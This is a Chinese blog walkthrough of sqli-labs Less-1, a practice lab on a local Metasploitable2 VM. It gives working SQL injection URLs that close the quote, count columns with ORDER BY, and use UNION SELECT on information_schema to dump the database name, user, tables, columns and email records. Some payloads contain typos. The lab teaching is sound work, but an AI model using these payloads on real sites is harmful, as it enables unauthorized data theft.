sqli-labs-master【Less-1】

最新推荐文章于 2024-02-05 16:03:55 发布
最新推荐文章于 2024-02-05 16:03:55 发布
阅读量271 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 网络安全 sql注入 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44352521/article/details/103391446
版权

首先在虚拟机中安装好Metasploitable2的靶机,然后查看地址,在浏览器的地址栏中输入:http://192.168.228.129/sqli-labs-master/Less-1/

这里呢,我们可以先参照源码进行一步步渗透和注入!
源码
可以看到$id是我们要输入的变量

sqli-labs-master/Less-1/

1. 在地址栏中的URL后输入?id=1

http://192.168.228.129/sqli-labs-master/Less-1/?id=1
//?表示连接符

select * from users where id='1' limit 0,1;
//当我们输入id=1时,在后台执行的语句其实是这样

我们看页面返回的结果:
?id=1
说明我们输入的变量被后台数据库执行了,并且可以看出是通过GET方式进行提交的(因为在URL中输入变量是可以返回结果的,这种可以返回结果的方式就是GET);

**2. 在URL后面输入id=1’ and 1=2 **

http://192.168.228.129/sqli-labs-master/Less-1/?id=1‘ and 1=2
//1后面的’是为了闭合前面

select * from users where id='1' and 1=2' limit 0,1;
//可以看出底下的结果提示逻辑错误,那是因为有一个单引号没有闭合,所以我们可以判断出这个注入点是字符型注入;

结果:
id=1' and 1=2
根据提示的内容,可以看出我们语法正确但逻辑错误。数字型注入与字符型注入最大的区别就在于数字型不需要单引号闭合,而字符型一般需要通过单引号来闭合。

那么该解决因为没有闭合而出现的语法错误呢?其实很简单,我们只需要把后面多出来的单引号注释掉就可以啦。

192.168.228.129/sqli-labs-master/Less-1/?id=1' and 1=1 --+ 

select * from users where id='1' and 1=1 --+ ' limit 0,1;


注释掉页面就显示出我们想要的内容啦!!!

3. 猜字段
想要知道有哪些字段我们就需要用到order by这条sql语句,首先,我们猜它有2个字段,如下:

http://192.168.228.129/sqli-labs-master/Less-1/?id= ’order by 2 --+

select * from users where id=' ' order by 2 --+ ' limit 0,1;


没有报错,也没有任何提示,接着我们猜有4个字段:

http://192.168.228.129/sqli-labs-master/Less-1/?id= ’order by 4 --+

select * from users where id=' ' order by 4 --+ ' limit 0,1;

在这里插入图片描述
可以看出,并没有4个字段,接着我们猜有三个字段:
在这里插入图片描述
返回正常,没有提示任何错误,然后我们用union来测试到底是不是有3个字段:
在这里插入图片描述
4. 爆数据库
可以看出,该表是有三个字段,那么现在我们可以进一步在获取一些信息,比如我们将1,2,3替换成一些数据库函数:

http://192.168.228.129/sqli-labs-master/Less-1/?id=union select NULL,database(),user() --+

select * from users where id=' ' union select NULL,database(),user() --+ ' lmimt 0,1;

在这里插入图片描述
我们发现,库名已经被我们知道了,接着我们把库里面的表爆出来;
5. 爆数据库里的表

http://192.168.228.129/sqli-labs-master/Less-1/?id=-1union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+

select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';

在这里插入图片描述
可以得出,在security中有四张表;
6. 爆表中的字段

http://192.168.228.129/sqli-labs-master/Less-1/?id=-1union select 1,2,group_concat(column_name) from information_schema.columns where  table_name=’emails‘ --+

在这里插入图片描述
可以得出,emails表中有两个字段,我们可以在数据库中来验证:
在这里插入图片描述
7. 爆表中字段的数据

192.168.228.129/sqli-labs-master/Less-1/?id=-1' union select 1,id,email_id from emails --+

在这里插入图片描述
结果与上图数据库中的一致,说明注入成功!

TTRy_Harder
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 587
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 341
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字型还是字符型,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
Sqli-labs-master注入详解:less-01
weixin_43096078的博客
08-24 561
通过学习sql注入,提高安全意识,切勿违法操作! 通过sqli-labs学习sql注入的第一天: 在学习之前需要先掌握一些基本知识: 连接数据库:mysql -uroot -p 回车 输入mysql密码 (root是对应的用户名) 查数据库:show databases; (会发现mysql自带了几个数据库,它们尤其相应的作用,建议查阅资料了解下什么意思) 使用某一个数据库:use database_name; (database_name是库名) 查询数据库中的表:show tables; 查看
sqli-labs-master Less-1
Risker
04-10 1075
提示提交id值,用单引号试一下,报错:猜测id值在查询语句中被单引号包裹。接下来用order by测字段数 测出3个字段。然后看当前的数据库,构造payload:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  union select 1,1,database() %23给我返回了这个id=1的值:要执行union后的语句就要让union前的查询语...
sqli-labs-master第一关Less-1超详细360°无死角教程
hih30250的博客
11-21 310
可以看到页面将错误的信息打印了出来,告诉我们是因为多了一个分号而导致的,那么我们就将我们输入的分号变为有效的让页面php代码给出的分号变为无效的。可以看到,当我们查看id=1的order by 到4的字段时报错了,所以字段数是3。可以看到,在字段2,3中可以注入查询命令查看数据。可能简陋了点,但并不妨碍我们练习。来获取当前数据库的名称以及数据库的用户名。”代表空格,避免字符串拼接使注释语法失效。接下来就好办了,我们使用union注入。的时候,页面给出了正常的数据。”代表注释后面的语句,“
SQL注入sqli-labs-master Less-1详解
luoshiyong123的博客
03-28 1533
1.读题 一开始是这个界面,提示输入id,这里能够输入的地方只有http请求里边,所以输入: http://localhost./sqll/sqli-labs-master/Less-1/?id=1试一下,?id=1是httpget方法的格式。然后: 得到密码,当把id换成2,3,4都可以得到对应password。但是要实现查询各种信息还不行。接下来找注入点 2.找注入点 id=...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
Sqli-Labs-Master】Less1-4
Oavinci的博客
06-06 497
phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4 sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj Less-1 ?id=1'报错 ?id=1'%23 返回正常 ?id=1' order by 3%23 返回正常 ?id=1' orde...
sqli-labs less-1
zbbjya的博客
02-08 408
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
MySQL基本查询语句/Sqli-labs-master Less-1练习
weixin_44727454的博客
04-18 2654
简单SQL语句;sqli-labs-master靶场第一关练习;
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 1922
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库:
sql注入练习——Less-1
nzw1134864657的博客
10-14 555
1.判断是否存在注入 输入“?id=1”,发现有变化,说明存在注入 2.判断闭合字符,注释后面的内容 输入“ ?id=1’ ” http://127.0.0.1/sqli-labs-master/Less-1/?id=1’%23 3.判断列数 使用order by(排序),来判断有几列数据,随便写,先写order by 10,回显错误,则说明列数是小于5,尝试5,回显结果仍是错误的,再尝试...
sql注入学习(sqli-labs-master靶场第一关)
最新发布
qq_64020439的博客
02-05 505
sql注入Sqli-labs-master靶场学习第一关
sqli-labs-master less-1 详解
m0_63521991的博客
01-29 1294
这行代码将从URL参数中获取的"id"值直接赋给变量$id,而没有对其进行任何过滤或转义。这导致了SQL注入漏洞的出现,可以通过在"id"参数中插入恶意的SQL代码来执行任意的数据库操作。” 将$id变量插入到SQL查询中,但没有对其进行任何过滤或转义,可以通过$id参数执行任意的数据库操作,而不受限于原始查询的意图。是 MySQL 数据库中的一个元数据(metadata)数据库,它包含了关于数据库、表、列、索引、权限等信息的元数据。联合查询 的前提是,两张表的列数相同,所以我们先表的判断列数。
SQLI—labs-master(前四关之闭合符详解)
Hala
03-30 1814
思路: 利用漏洞极多的靶场来模拟SQL注入 环境: Metasploitable2 步骤: 1.查看虚拟主机的IP 2.开启服务,可见如下的TCP端口就处于开启状态 root@metasploitable:~# nmap -p0-65535 192.168.211.132 Starting Nmap 4.53 ( http://insecure.org ) at 2020...
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1899
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值